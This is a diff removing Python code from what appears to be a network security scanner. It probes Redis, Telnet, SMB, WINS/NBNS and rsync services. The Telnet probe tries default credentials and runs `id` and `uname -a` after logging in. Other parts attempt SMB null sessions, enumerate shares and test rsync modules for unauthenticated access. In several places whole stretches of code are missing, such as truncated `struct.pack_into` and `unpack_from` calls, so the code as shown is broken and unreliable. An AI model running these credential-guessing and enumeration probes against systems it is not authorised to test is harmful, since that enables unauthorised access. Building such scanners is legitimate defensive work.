if ips: - raw["connected_clients"] = list(ips) - findings.append(Finding( - severity=Severity.LOW, - title=f"Redis client IPs disclosed ({len(ips)} clients)", - description=f"CLIENT LIST reveals connected IPs: {', '.join(sorted(ips)[:5])}", - evidence=f"IPs: {', '.join(sorted(ips)[:10])}", - remediation="Rename or disable CLIENT command.", - confidence="certain", - )) - return findings - - def _redis_check_persistence(self, sock, raw): - """Check INFO persistence for missing or stale RDB saves.""" - findings = [] - resp = self._redis_cmd(sock, "INFO persistence") - if resp.startswith("-"): - return findings - import time as _time - for line in resp.split("\r\n"): - if line.startswith("rdb_last_bgsave_time:"): - try: - ts = int(line.split(":", 1)[1].strip()) - if ts == 0: - findings.append(Finding( - severity=Severity.LOW, - title="Redis has never performed an RDB save", - description="rdb_last_bgsave_time is 0, meaning no background save has ever been performed. " - "This may indicate a cache-only instance with persistence disabled, or an ephemeral deployment.", - evidence="rdb_last_bgsave_time=0", - remediation="Verify whether RDB persistence is intentionally disabled; if not, configure BGSAVE.", - cwe_id="CWE-345", - confidence="tentative", - )) - elif (_time.time() - ts) > 365 * 86400: - age_days = int((_time.time() - ts) / 86400) - findings.append(Finding( - severity=Severity.LOW, - title=f"Redis RDB save is stale ({age_days} days old)", - description="The last RDB background save timestamp is over 1 year old. 
" - "This may indicate disabled persistence, a long-running cache-only instance, or stale data.", - evidence=f"rdb_last_bgsave_time={ts}, age={age_days}d", - remediation="Verify persistence configuration; stale saves may indicate data loss risk.", - cwe_id="CWE-345", - confidence="tentative", - )) - except (ValueError, IndexError): - pass - break - return findings - - - def _service_info_telnet(self, target, port): # default port: 23 - """ - Assess Telnet service security: banner, negotiation options, default - credentials, privilege level, system fingerprint, and credential validation. - - Checks performed (in order): - - 1. Banner grab and IAC option parsing. - 2. Default credential check — try common user:pass combos. - 3. Privilege escalation check — report if root shell is obtained. - 4. System fingerprint — run ``id`` and ``uname -a`` on successful login. - 5. Arbitrary credential acceptance test. - - Parameters - ---------- - target : str - Hostname or IP address. - port : int - Port being probed. - - Returns - ------- - dict - Structured findings. - """ - import time as _time - - findings = [] - result = { - "banner": None, - "negotiation_options": [], - "accepted_credentials": [], - "system_info": None, - } - - findings.append(Finding( - severity=Severity.MEDIUM, - title="Telnet service is running (unencrypted remote access).", - description="Telnet transmits all data including credentials in cleartext.", - evidence=f"Telnet port {port} is open on {target}.", - remediation="Replace Telnet with SSH for encrypted remote access.", - owasp_id="A02:2021", - cwe_id="CWE-319", - confidence="certain", - )) - - # --- 1. 
Banner grab + IAC negotiation parsing --- - try: - sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) - sock.settimeout(5) - sock.connect((target, port)) - raw = sock.recv(2048) - sock.close() - except Exception as e: - return probe_error(target, port, "Telnet", e) - - # Parse IAC sequences - iac_options = [] - cmd_names = {251: "WILL", 252: "WONT", 253: "DO", 254: "DONT"} - opt_names = { - 0: "BINARY", 1: "ECHO", 3: "SGA", 5: "STATUS", - 24: "TERMINAL_TYPE", 31: "WINDOW_SIZE", 32: "TERMINAL_SPEED", - 33: "REMOTE_FLOW", 34: "LINEMODE", 36: "ENVIRON", 39: "NEW_ENVIRON", - } - i = 0 - text_parts = [] - while i < len(raw): - if raw[i] == 0xFF and i + 2 < len(raw): - cmd = cmd_names.get(raw[i + 1], f"CMD_{raw[i+1]}") - opt = opt_names.get(raw[i + 2], f"OPT_{raw[i+2]}") - iac_options.append(f"{cmd} {opt}") - i += 3 - else: - if 32 <= raw[i] < 127: - text_parts.append(chr(raw[i])) - i += 1 - - banner_text = "".join(text_parts).strip() - if banner_text: - result["banner"] = banner_text - elif iac_options: - result["banner"] = "(IAC negotiation only, no text banner)" - else: - result["banner"] = "(no banner)" - result["negotiation_options"] = iac_options - - # --- 2–4. 
Default credential check with system fingerprint --- - def _try_telnet_login(user, passwd): - """Attempt Telnet login, return (success, uid_line, uname_line).""" - try: - s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) - s.settimeout(5) - s.connect((target, port)) - - # Read until login prompt - buf = b"" - deadline = _time.time() + 5 - while _time.time() < deadline: - try: - chunk = s.recv(1024) - if not chunk: - break - buf += chunk - if b"login:" in buf.lower() or b"username:" in buf.lower(): - break - except socket.timeout: - break - - if b"login:" not in buf.lower() and b"username:" not in buf.lower(): - s.close() - return False, None, None - - s.sendall(user.encode() + b"\n") - - # Read until password prompt - buf = b"" - deadline = _time.time() + 5 - while _time.time() < deadline: - try: - chunk = s.recv(1024) - if not chunk: - break - buf += chunk - if b"assword:" in buf: - break - except socket.timeout: - break - - if b"assword:" not in buf: - s.close() - return False, None, None - - s.sendall(passwd.encode() + b"\n") - _time.sleep(1.5) - - # Read response - resp = b"" - try: - while True: - chunk = s.recv(4096) - if not chunk: - break - resp += chunk - except socket.timeout: - pass - - resp_text = resp.decode("utf-8", errors="replace") - - # Check for login failure indicators - fail_indicators = ["incorrect", "failed", "denied", "invalid", "login:"] - if any(ind in resp_text.lower() for ind in fail_indicators): - s.close() - return False, None, None - - # Login succeeded — try to get system info - uid_line = None - uname_line = None - try: - s.sendall(b"id\n") - _time.sleep(0.5) - id_resp = s.recv(2048).decode("utf-8", errors="replace") - for line in id_resp.replace("\r\n", "\n").split("\n"): - cleaned = line.strip() - # Remove ANSI/control sequences - import re - cleaned = re.sub(r"\x1b\[[0-9;]*[a-zA-Z]", "", cleaned) - if "uid=" in cleaned: - uid_line = cleaned - break - except Exception: - pass - - try: - s.sendall(b"uname -a\n") - 
_time.sleep(0.5) - uname_resp = s.recv(2048).decode("utf-8", errors="replace") - for line in uname_resp.replace("\r\n", "\n").split("\n"): - cleaned = line.strip() - import re - cleaned = re.sub(r"\x1b\[[0-9;]*[a-zA-Z]", "", cleaned) - if "linux" in cleaned.lower() or "unix" in cleaned.lower() or "darwin" in cleaned.lower(): - uname_line = cleaned - break - except Exception: - pass - - s.close() - return True, uid_line, uname_line - - except Exception: - return False, None, None - - system_info_captured = False - for user, passwd in _TELNET_DEFAULT_CREDS: - success, uid_line, uname_line = _try_telnet_login(user, passwd) - if success: - result["accepted_credentials"].append(f"{user}:{passwd}") - findings.append(Finding( - severity=Severity.CRITICAL, - title=f"Telnet default credential accepted: {user}:{passwd}", - description="The Telnet server accepted a well-known default credential.", - evidence=f"Accepted credential: {user}:{passwd}", - remediation="Change default passwords immediately and enforce strong credential policies.", - owasp_id="A07:2021", - cwe_id="CWE-798", - confidence="certain", - )) - # Check for root access - if uid_line and "uid=0" in uid_line: - findings.append(Finding( - severity=Severity.CRITICAL, - title=f"Root shell access via Telnet with {user}:{passwd}.", - description="Root-level shell access was obtained over an unencrypted Telnet session.", - evidence=f"uid=0 in id output: {uid_line}", - remediation="Disable root login via Telnet; use SSH with key-based auth instead.", - owasp_id="A07:2021", - cwe_id="CWE-250", - confidence="certain", - )) - - # Capture system info once - if not system_info_captured and (uid_line or uname_line): - parts = [] - if uid_line: - parts.append(uid_line) - if uname_line: - parts.append(uname_line) - result["system_info"] = " | ".join(parts) - system_info_captured = True - - # --- 5. 
Arbitrary credential acceptance test --- - import string as _string - ruser = "".join(random.choices(_string.ascii_lowercase, k=8)) - rpass = "".join(random.choices(_string.ascii_letters + _string.digits, k=12)) - success, _, _ = _try_telnet_login(ruser, rpass) - if success: - findings.append(Finding( - severity=Severity.CRITICAL, - title="Telnet accepts arbitrary credentials", - description="Random credentials were accepted, indicating a dangerous misconfiguration or deceptive service.", - evidence=f"Accepted random creds {ruser}:{rpass}", - remediation="Investigate immediately — authentication is non-functional.", - owasp_id="A07:2021", - cwe_id="CWE-287", - confidence="certain", - )) - - return probe_result(raw_data=result, findings=findings) - - - def _service_info_smb(self, target, port): # default port: 445 - """ - Probe SMB services: dialect negotiation, version extraction, CVE matching, - null session test, and security flag analysis. - - Checks performed: - - 1. SMB negotiate — determine supported dialect (SMBv1/v2/v3). - 2. Version extraction — parse Samba/Windows version from NativeOS/NativeLanMan. - 3. Security flags — check signing requirements. - 4. Null session — attempt anonymous IPC$ access. - 5. CVE matching — run check_cves on extracted Samba version. - - Parameters - ---------- - target : str - Hostname or IP address. - port : int - Port being probed. - - Returns - ------- - dict - Structured findings. - """ - findings = [] - raw = { - "banner": None, "dialect": None, "server_os": None, - "server_domain": None, "samba_version": None, - "signing_required": None, "smbv1_supported": False, - } - - # --- 1. 
SMBv1 Negotiate --- - # Build a proper SMBv1 Negotiate Protocol Request with NT LM 0.12 dialect - dialects = b"\x02NT LM 0.12\x00\x02SMB 2.002\x00\x02SMB 2.???\x00" - smb_header = bytearray(32) - smb_header[0:4] = b"\xffSMB" # Protocol ID - smb_header[4] = 0x72 # Command: Negotiate - # Flags: 0x18 (case-sensitive, canonicalized paths) - smb_header[13] = 0x18 - # Flags2: unicode + NT status + long names - struct.pack_into("I", len(smb_payload)) - netbios_header = b"\x00" + netbios_header[1:] # force type=0 - - try: - sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) - sock.settimeout(4) - sock.connect((target, port)) - sock.sendall(netbios_header + smb_payload) - - # Read NetBIOS header (4 bytes) + full response - resp_hdr = self._smb_recv_exact(sock, 4) - if not resp_hdr: - sock.close() - findings.append(Finding( - severity=Severity.INFO, - title="SMB port open but no negotiation response", - description=f"Port {port} is open but SMB did not respond to negotiation.", - confidence="tentative", - )) - return probe_result(raw_data=raw, findings=findings) - - resp_len = struct.unpack(">I", b"\x00" + resp_hdr[1:4])[0] - resp_data = self._smb_recv_exact(sock, min(resp_len, 4096)) - sock.close() - - if not resp_data or len(resp_data) < 36: - raw["banner"] = "SMB response too short" - findings.append(Finding( - severity=Severity.MEDIUM, - title="SMB service responded to negotiation probe", - description=f"SMB on {target}:{port} accepts negotiation requests.", - evidence=f"Response: {(resp_data or b'').hex()[:48]}", - remediation="Restrict SMB access to trusted networks; disable SMBv1.", - owasp_id="A01:2021", - cwe_id="CWE-284", - confidence="certain", - )) - return probe_result(raw_data=raw, findings=findings) - - # Check if SMBv1 or SMBv2 response - protocol_id = resp_data[0:4] - - if protocol_id == b"\xffSMB": - # --- SMBv1 response --- - raw["smbv1_supported"] = True - raw["banner"] = "SMBv1 negotiation response received" - - # Parse negotiate response body 
(after 32-byte header) - if len(resp_data) >= 37: - word_count = resp_data[32] - if word_count >= 17 and len(resp_data) >= 32 + 1 + 34: - words_start = 33 - dialect_idx = struct.unpack_from("= 17 and len(resp_data) >= words_start + 2 + 22 + 2: - sec_blob_len = struct.unpack_from("= 1: - raw["server_domain"] = parts[0] - if len(parts) >= 2: - raw["server_name"] = parts[1] - except Exception: - pass - - # SMBv1 is a security concern - findings.append(Finding( - severity=Severity.MEDIUM, - title="SMBv1 protocol supported (legacy, attack surface for MS17-010)", - description=f"SMB on {target}:{port} supports SMBv1, which is vulnerable to " - "EternalBlue (MS17-010) and other SMBv1-specific attacks.", - evidence=f"Negotiated dialect: {raw['dialect']}, SMBv1 response received.", - remediation="Disable SMBv1 on the server (e.g., 'server min protocol = SMB2' in smb.conf).", - owasp_id="A06:2021", - cwe_id="CWE-757", - confidence="certain", - )) - - elif protocol_id == b"\xfeSMB": - # --- SMBv2/3 response --- - raw["banner"] = "SMBv2 negotiation response received" - if len(resp_data) >= 72: - smb2_dialect = struct.unpack_from(" Session Setup (null) -> Tree Connect IPC$ -> - Open \\srvsvc pipe -> DCE/RPC Bind -> NetShareEnumAll -> parse results. - - Parameters - ---------- - target : str - Hostname or IP address. - port : int - SMB port (typically 445). - - Returns - ------- - list[dict] - Each dict has keys ``name`` (str), ``type`` (int), ``comment`` (str). - Returns empty list on any failure. - """ - sock = None - try: - sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) - sock.settimeout(4) - sock.connect((target, port)) - - def _send_smb(payload): - nb_hdr = b"\x00" + struct.pack(">I", len(payload))[1:] - sock.sendall(nb_hdr + payload) - - def _recv_smb(): - resp_hdr = self._smb_recv_exact(sock, 4) - if not resp_hdr: - return None - resp_len = struct.unpack(">I", b"\x00" + resp_hdr[1:4])[0] - return self._smb_recv_exact(sock, min(resp_len, 65536)) - - # ---- 1. 
Negotiate (NT LM 0.12) ---- - dialects = b"\x02NT LM 0.12\x00" - smb_hdr = bytearray(32) - smb_hdr[0:4] = b"\xffSMB" - smb_hdr[4] = 0x72 # Negotiate - smb_hdr[13] = 0x18 - struct.pack_into(" len(enum_resp): - data_len = len(enum_resp) - data_off - if data_off >= len(enum_resp) or data_len < 24: - return [] - - dce_data = enum_resp[data_off:data_off + data_len] - - # DCE/RPC response header is 24 bytes, then stub data - if len(dce_data) < 24: - return [] - dce_stub = dce_data[24:] - - return self._parse_netshareenumall_response(dce_stub) - - except Exception: - return [] - finally: - if sock: - try: - sock.close() - except Exception: - pass - - @staticmethod - def _parse_netshareenumall_response(stub): - """Parse NetShareEnumAll DCE/RPC stub response into share list. - - Parameters - ---------- - stub : bytes - DCE/RPC stub data (after the 24-byte response header). - - Returns - ------- - list[dict] - Each dict: {"name": str, "type": int, "comment": str}. - """ - shares = [] - try: - if len(stub) < 20: - return [] - - # Response stub layout: - # [4] info_level - # [4] switch_value - # [4] referent pointer for SHARE_INFO_1_CONTAINER - # [4] entries_read - # [4] referent pointer for array - # Then for each entry: [4] name_ptr, [4] type, [4] comment_ptr - # Then the actual strings (NDR conformant arrays) - - offset = 0 - offset += 4 # info_level - offset += 4 # switch_value - offset += 4 # referent pointer - if offset + 4 > len(stub): - return [] - entries_read = struct.unpack_from(" 500: - return [] - - offset += 4 # array referent pointer - offset += 4 # max count (NDR array header) - - # Read the fixed-size entries: name_ptr(4) + type(4) + comment_ptr(4) each - entry_records = [] - for _ in range(entries_read): - if offset + 12 > len(stub): - break - name_ptr = struct.unpack_from(" len(data): - return "", off - max_count = struct.unpack_from(" len(data): - s = data[off:].decode("utf-16-le", errors="ignore").rstrip("\x00") - return s, len(data) - s = data[off:off + 
byte_len].decode("utf-16-le", errors="ignore").rstrip("\x00") - off += byte_len - # Align to 4-byte boundary - if off % 4: - off += 4 - (off % 4) - return s, off - - for name_ptr, share_type, comment_ptr in entry_records: - name, offset = read_ndr_string(stub, offset) - comment, offset = read_ndr_string(stub, offset) - if name: - shares.append({ - "name": name, - "type": share_type, - "comment": comment, - }) - - except Exception: - pass - return shares - - def _smb_try_null_session(self, target, port): - """Attempt SMBv1 null session to extract Samba version from SessionSetup response. - - Returns - ------- - str or None - Extracted Samba version string (e.g. '4.6.3'), or None. - """ - try: - sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) - sock.settimeout(3) - sock.connect((target, port)) - - # --- Negotiate --- - dialects = b"\x02NT LM 0.12\x00" - smb_header = bytearray(32) - smb_header[0:4] = b"\xffSMB" - smb_header[4] = 0x72 # Negotiate - smb_header[13] = 0x18 - struct.pack_into("I", len(payload))[1:] - sock.sendall(nb_hdr + payload) - - # Read negotiate response - resp_hdr = self._smb_recv_exact(sock, 4) - if not resp_hdr: - sock.close() - return None - resp_len = struct.unpack(">I", b"\x00" + resp_hdr[1:4])[0] - self._smb_recv_exact(sock, min(resp_len, 4096)) - - # --- Session Setup AndX (null session) --- - smb_header2 = bytearray(32) - smb_header2[0:4] = b"\xffSMB" - smb_header2[4] = 0x73 # Session Setup AndX - smb_header2[13] = 0x18 - struct.pack_into("I", len(payload2))[1:] - sock.sendall(nb_hdr2 + payload2) - - # Read session setup response - resp_hdr2 = self._smb_recv_exact(sock, 4) - if not resp_hdr2: - sock.close() - return None - resp_len2 = struct.unpack(">I", b"\x00" + resp_hdr2[1:4])[0] - resp_data2 = self._smb_recv_exact(sock, min(resp_len2, 4096)) - sock.close() - - if not resp_data2: - return None - - # Extract NativeOS string — contains "Samba x.y.z" or "Windows ..." 
- # Search the response bytes for "Samba" followed by a version - resp_text = resp_data2.decode("utf-8", errors="ignore") - samba_match = _re.search(r'Samba\s+(\d+\.\d+(?:\.\d+)?)', resp_text) - if samba_match: - return samba_match.group(1) - - # Also try UTF-16-LE decoding - resp_text_u16 = resp_data2.decode("utf-16-le", errors="ignore") - samba_match_u16 = _re.search(r'Samba\s+(\d+\.\d+(?:\.\d+)?)', resp_text_u16) - if samba_match_u16: - return samba_match_u16.group(1) - - except Exception: - pass - return None - - - # NetBIOS name suffix → human-readable type - _NBNS_SUFFIX_TYPES = { - 0x00: "Workstation", - 0x03: "Messenger (logged-in user)", - 0x20: "File Server (SMB sharing)", - 0x1C: "Domain Controller", - 0x1B: "Domain Master Browser", - 0x1E: "Browser Election Service", - } - - def _service_info_wins(self, target, port): # ports: 42 (WINS/TCP), 137 (NBNS/UDP) - """ - Probe WINS / NetBIOS Name Service for name enumeration and service detection. - - Port 42 (TCP): WINS replication — sends MS-WINSRA Association Start Request - to fingerprint the service and extract NBNS version. Also fires a UDP - side-probe to port 137 for NetBIOS name enumeration. - Port 137 (UDP): NBNS — sends wildcard node-status query (RFC 1002) to - enumerate registered NetBIOS names. - - Parameters - ---------- - target : str - Hostname or IP address. - port : int - Port being probed. - - Returns - ------- - dict - Structured findings. 
- """ - findings = [] - raw = {"banner": None, "netbios_names": [], "wins_responded": False} - - # -- Build NetBIOS wildcard node-status query (RFC 1002) -- - tid = struct.pack('>H', random.randint(0, 0xFFFF)) - # Flags: 0x0010 (recursion desired) - # Questions: 1, Answers/Auth/Additional: 0 - header = tid + struct.pack('>HHHHH', 0x0010, 1, 0, 0, 0) - # Encoded wildcard name "*" (first-level NetBIOS encoding) - # '*' (0x2A) → half-bytes 0x02, 0x0A → chars 'C','K', padded with 'A' (0x00 half-bytes) - qname = b'\x20' + b'CKAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + b'\x00' - # Type: NBSTAT (0x0021), Class: IN (0x0001) - question = struct.pack('>HH', 0x0021, 0x0001) - nbns_query = header + qname + question - - def _parse_nbns_response(data): - """Parse a NetBIOS node-status response and return list of (name, suffix, flags).""" - names = [] - if len(data) < 14: - return names - # Verify transaction ID matches - if data[:2] != tid: - return names - ancount = struct.unpack('>H', data[6:8])[0] - if ancount == 0: - return names - # Skip past header (12 bytes) then answer name (compressed pointer or full) - idx = 12 - if idx < len(data) and data[idx] & 0xC0 == 0xC0: - idx += 2 - else: - while idx < len(data) and data[idx] != 0: - idx += data[idx] + 1 - idx += 1 - # Type (2) + Class (2) + TTL (4) + RDLength (2) = 10 bytes - if idx + 10 > len(data): - return names - idx += 10 - if idx >= len(data): - return names - num_names = data[idx] - idx += 1 - # Each name entry: 15 bytes name + 1 byte suffix + 2 bytes flags = 18 bytes - for _ in range(num_names): - if idx + 18 > len(data): - break - name_bytes = data[idx:idx + 15] - suffix = data[idx + 15] - flags = struct.unpack('>H', data[idx + 16:idx + 18])[0] - name = name_bytes.decode('ascii', errors='ignore').rstrip() - names.append((name, suffix, flags)) - idx += 18 - return names - - def _udp_nbns_probe(udp_port): - """Send UDP NBNS wildcard query, return parsed names or empty list.""" - sock = None - try: - sock = 
socket.socket(socket.AF_INET, socket.SOCK_DGRAM) - sock.settimeout(3) - sock.sendto(nbns_query, (target, udp_port)) - data, _ = sock.recvfrom(1024) - return _parse_nbns_response(data) - except Exception: - return [] - finally: - if sock is not None: - sock.close() - - def _add_nbns_findings(names, probe_label): - """Populate raw data and findings from enumerated NetBIOS names.""" - raw["netbios_names"] = [ - {"name": n, "suffix": f"0x{s:02X}", "type": self._NBNS_SUFFIX_TYPES.get(s, f"Unknown(0x{s:02X})")} - for n, s, _f in names - ] - name_list = "; ".join( - f"{n} <{s:02X}> ({self._NBNS_SUFFIX_TYPES.get(s, 'unknown')})" - for n, s, _f in names - ) - findings.append(Finding( - severity=Severity.HIGH, - title="NetBIOS name enumeration successful", - description=( - f"{probe_label} responded to a wildcard node-status query, " - "leaking computer name, domain membership, and potentially logged-in users." - ), - evidence=f"Names: {name_list[:200]}", - remediation="Block UDP port 137 at the firewall; disable NetBIOS over TCP/IP in network adapter settings.", - owasp_id="A01:2021", - cwe_id="CWE-200", - confidence="certain", - )) - findings.append(Finding( - severity=Severity.INFO, - title=f"NetBIOS names discovered ({len(names)} entries)", - description=f"Enumerated names: {name_list}", - evidence=f"Names: {name_list[:300]}", - confidence="certain", - )) - - try: - if port == 137: - # -- Direct UDP NBNS probe -- - names = _udp_nbns_probe(137) - if names: - raw["banner"] = f"NBNS: {len(names)} name(s) enumerated" - _add_nbns_findings(names, f"NBNS on {target}:{port}") - else: - raw["banner"] = "NBNS port open (no response to wildcard query)" - findings.append(Finding( - severity=Severity.INFO, - title="NBNS port open but no names returned", - description=f"UDP port {port} on {target} did not respond to NetBIOS wildcard query.", - confidence="tentative", - )) - else: - # -- TCP WINS replication probe (MS-WINSRA Association Start Request) -- - # Also attempt UDP NBNS 
# Continuation of the WINS/NBNS probe — the method's `def`, docstring and opening
# `try:` lie above this chunk. `raw`, `findings`, `target`, `port` and the local
# helpers `_udp_nbns_probe` / `_add_nbns_findings` are presumably defined earlier
# in the same method — TODO confirm against the full source.

        # NBNS side-probe to port 137 for name enumeration
        names = _udp_nbns_probe(137)
        if names:
            _add_nbns_findings(names, f"NBNS side-probe to {target}:137")

        # Build MS-WINSRA Association Start Request per [MS-WINSRA] §2.2.3:
        #   Common Header (16 bytes):
        #     Packet Length: 41 (0x00000029) — excludes this field
        #     Reserved: 0x00007800 (opcode, ignored by spec)
        #     Destination Assoc Handle: 0x00000000 (first message, unknown)
        #     Message Type: 0x00000000 (Association Start Request)
        #   Body (25 bytes):
        #     Sender Assoc Handle: random 4 bytes
        #     NBNS Major Version: 2 (required)
        #     NBNS Minor Version: 5 (Win2k+)
        #     Reserved: 21 zero bytes (pad to 41)
        sender_ctx = random.randint(1, 0xFFFFFFFF)
        wrepl_header = struct.pack('>I', 41)           # Packet Length
        wrepl_header += struct.pack('>I', 0x00007800)  # Reserved / opcode
        wrepl_header += struct.pack('>I', 0)           # Destination Assoc Handle
        wrepl_header += struct.pack('>I', 0)           # Message Type: Start Request
        wrepl_body = struct.pack('>I', sender_ctx)     # Sender Assoc Handle
        wrepl_body += struct.pack('>HH', 2, 5)         # Major=2, Minor=5
        wrepl_body += b'\x00' * 21                     # Reserved padding
        wrepl_packet = wrepl_header + wrepl_body

        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.settimeout(3)
        sock.connect((target, port))
        sock.sendall(wrepl_packet)

        # Distinguish three recv outcomes:
        #   data received  → parse as WREPL (confirmed WINS)
        #   timeout        → connection held open, no reply (likely WINS, non-partner)
        #   empty / closed → server sent FIN immediately (unconfirmed service)
        data = None
        recv_timed_out = False
        try:
            data = sock.recv(1024)
        except socket.timeout:
            recv_timed_out = True
        finally:
            sock.close()

        if data and len(data) >= 20:
            raw["wins_responded"] = True
            # Parse response: first 4 bytes = Packet Length, next 16 = common header
            resp_msg_type = struct.unpack('>I', data[12:16])[0] if len(data) >= 16 else None
            version_info = ""
            if resp_msg_type == 1 and len(data) >= 24:
                # Association Start Response — extract version
                resp_major = struct.unpack('>H', data[20:22])[0] if len(data) >= 22 else None
                resp_minor = struct.unpack('>H', data[22:24])[0] if len(data) >= 24 else None
                if resp_major is not None:
                    version_info = f" (NBNS version {resp_major}.{resp_minor})"
                    raw["nbns_version"] = {"major": resp_major, "minor": resp_minor}
            raw["banner"] = f"WINS replication service{version_info}"
            findings.append(Finding(
                severity=Severity.MEDIUM,
                title="WINS replication service exposed",
                description=(
                    f"WINS on {target}:{port} responded to a WREPL Association Start Request{version_info}. "
                    "WINS is a legacy name-resolution service vulnerable to spoofing, enumeration, and "
                    "multiple remote code execution flaws (CVE-2004-1080, CVE-2009-1923, CVE-2009-1924). "
                    "It should not be accessible from untrusted networks."
                ),
                evidence=f"WREPL response ({len(data)} bytes): {data[:24].hex()}",
                remediation=(
                    "Decommission WINS or restrict TCP port 42 to trusted replication partners. "
                    "If WINS is required, apply all patches (MS04-045, MS09-039) and set the registry key "
                    "RplOnlyWCnfPnrs=1 to accept replication only from configured partners."
                ),
                owasp_id="A01:2021",
                cwe_id="CWE-284",
                confidence="certain",
            ))
        elif data:
            # Got some data but not enough for a valid WREPL response
            raw["wins_responded"] = True
            raw["banner"] = f"Port {port} responded ({len(data)} bytes, non-WREPL)"
            findings.append(Finding(
                severity=Severity.LOW,
                title=f"Service on port {port} responded but is not standard WINS",
                description=(
                    f"TCP port {port} on {target} returned data that does not match the "
                    "WINS replication protocol (MS-WINSRA). Another service may be listening."
                ),
                evidence=f"Response ({len(data)} bytes): {data[:32].hex()}",
                confidence="tentative",
            ))
        elif recv_timed_out:
            # Connection accepted AND held open after our WREPL packet, but no
            # reply — consistent with WINS silently dropping a non-partner request
            # (RplOnlyWCnfPnrs=1). A non-WINS service would typically RST or FIN.
            raw["banner"] = "WINS likely (connection held, no WREPL reply)"
            findings.append(Finding(
                severity=Severity.MEDIUM,
                title="WINS replication port open (non-partner rejected)",
                description=(
                    f"TCP port {port} on {target} accepted a WREPL Association Start Request "
                    "and held the connection open without responding, consistent with a WINS "
                    "server configured to reject non-partner replication (RplOnlyWCnfPnrs=1). "
                    "An exposed WINS port is a legacy attack surface subject to remote code "
                    "execution flaws (CVE-2004-1080, CVE-2009-1923, CVE-2009-1924)."
                ),
                evidence="TCP connection accepted and held open; WREPL handshake: no reply after 3 s",
                remediation=(
                    "Block TCP port 42 at the firewall if WINS replication is not needed. "
                    "If required, restrict to trusted replication partners only."
                ),
                owasp_id="A01:2021",
                cwe_id="CWE-284",
                confidence="firm",
            ))
        else:
            # recv returned empty — server immediately closed the connection.
            # Cannot confirm WINS; don't produce a finding. The port scan
            # already reports the open port; a "service unconfirmed" finding
            # adds no actionable value to the report.
            pass
    except Exception as e:
        return probe_error(target, port, "WINS/NBNS", e)

    if not findings:
        # Could not confirm WINS — downgrade the protocol label so the UI
        # does not display an unverified "WINS" tag from WELL_KNOWN_PORTS.
# Tail of the WINS/NBNS probe (its `if not findings:` opener lies above this chunk),
# followed by the rsync service probe.

        port_protocols = self.state.get("port_protocols")
        if port_protocols and port_protocols.get(port) in ("wins", "nbns"):
            port_protocols[port] = "unknown"
        return None

    return probe_result(raw_data=raw, findings=findings)


def _service_info_rsync(self, target, port):  # default port: 873
    """
    Rsync service probe: version handshake, module enumeration, auth check.

    Checks performed:

    1. Banner grab — extract rsync protocol version.
    2. Module enumeration — ``#list`` to discover available modules.
    3. Auth check — connect to each module to test unauthenticated access.

    Parameters
    ----------
    target : str
        Hostname or IP address.
    port : int
        Port being probed.

    Returns
    -------
    dict
        Structured findings.
    """
    findings = []
    raw = {"version": None, "modules": []}

    # --- 1. Connect and receive banner ---
    try:
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.settimeout(3)
        sock.connect((target, port))
        banner = sock.recv(256).decode("utf-8", errors="ignore").strip()
    except Exception as e:
        return probe_error(target, port, "rsync", e)

    if not banner.startswith("@RSYNCD:"):
        try:
            sock.close()
        except Exception:
            pass
        findings.append(Finding(
            severity=Severity.INFO,
            title=f"Port {port} open but no rsync banner",
            description=f"Expected @RSYNCD banner, got: {banner[:80]}",
            confidence="tentative",
        ))
        return probe_result(raw_data=raw, findings=findings)

    # Extract protocol version
    proto_version = banner.split(":", 1)[1].strip().split()[0] if ":" in banner else None
    raw["version"] = proto_version

    findings.append(Finding(
        severity=Severity.LOW,
        title=f"Rsync service detected (protocol {proto_version})",
        description=f"Rsync daemon is running on {target}:{port}.",
        evidence=f"Banner: {banner}",
        remediation="Restrict rsync access to trusted networks; require authentication for all modules.",
        cwe_id="CWE-200",
        confidence="certain",
    ))

    # --- 2. Module enumeration ---
    try:
        # Send matching version handshake + list request
        sock.sendall(f"@RSYNCD: {proto_version}\n".encode())
        sock.sendall(b"#list\n")
        # Read module listing until @RSYNCD: EXIT
        module_data = b""
        while True:
            chunk = sock.recv(4096)
            if not chunk:
                break
            module_data += chunk
            if b"@RSYNCD: EXIT" in module_data:
                break
        sock.close()

        modules = []
        for line in module_data.decode("utf-8", errors="ignore").splitlines():
            line = line.strip()
            if line.startswith("@RSYNCD:") or not line:
                continue
            # Format: "module_name\tdescription" or just "module_name"
            parts = line.split("\t", 1)
            mod_name = parts[0].strip()
            mod_desc = parts[1].strip() if len(parts) > 1 else ""
            if mod_name:
                modules.append({"name": mod_name, "description": mod_desc})

        raw["modules"] = modules

        if modules:
            mod_names = ", ".join(m["name"] for m in modules)
            findings.append(Finding(
                severity=Severity.HIGH,
                title=f"Rsync module enumeration successful: {mod_names}",
                description=f"Rsync on {target}:{port} exposes {len(modules)} module(s). "
                            "Exposed modules may allow file read/write.",
                evidence=f"Modules: {mod_names}",
                remediation="Restrict module listing and require authentication for all rsync modules.",
                owasp_id="A01:2021",
                cwe_id="CWE-200",
                confidence="certain",
            ))
    except Exception as e:
        self.P(f"Rsync module enumeration failed on {target}:{port}: {e}", color='y')
        try:
            sock.close()
        except Exception:
            pass

    # --- 3. Test unauthenticated access per module ---
# Tail of the rsync probe (per-module unauthenticated-access test), followed by
# the head of the VNC probe.

    for mod in raw["modules"]:
        try:
            sock2 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            sock2.settimeout(3)
            sock2.connect((target, port))
            sock2.recv(256)  # banner
            sock2.sendall(f"@RSYNCD: {proto_version}\n".encode())
            sock2.sendall(f"{mod['name']}\n".encode())
            resp = sock2.recv(4096).decode("utf-8", errors="ignore")
            sock2.close()

            if "@RSYNCD: OK" in resp:
                findings.append(Finding(
                    severity=Severity.CRITICAL,
                    title=f"Rsync module '{mod['name']}' accessible without authentication",
                    description=f"Module '{mod['name']}' on {target}:{port} allows unauthenticated access. "
                                "An attacker can read or write arbitrary files within this module.",
                    evidence=f"Connected to module '{mod['name']}', received @RSYNCD: OK",
                    remediation=f"Add 'auth users' and 'secrets file' to the [{mod['name']}] section in rsyncd.conf.",
                    owasp_id="A01:2021",
                    cwe_id="CWE-284",
                    confidence="certain",
                ))
